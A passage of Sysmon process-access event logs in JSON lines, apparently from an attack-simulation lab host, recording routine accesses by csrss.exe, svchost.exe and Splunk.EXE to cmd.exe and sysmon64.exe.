Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE","TargetProcessGUID":"{41C8662E-1FF0-5F25-0000-0010FE3D0500}","TargetProcessId":"3668","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+14738|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+d8a0|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2970,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.155\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF0-5F25-0000-0010FE3D0500}\r\nTargetProcessId: 3668\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.155","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF0-5F25-0000-0010FE3D0500}","TargetProcessId":"3668","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2971,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.155\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.155","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2972,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.155\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.155","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2973,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.155\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.155","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2974,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.155\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.155","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2975,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.155\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.155","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2976,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.155\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.155","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2977,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.155\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.155","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
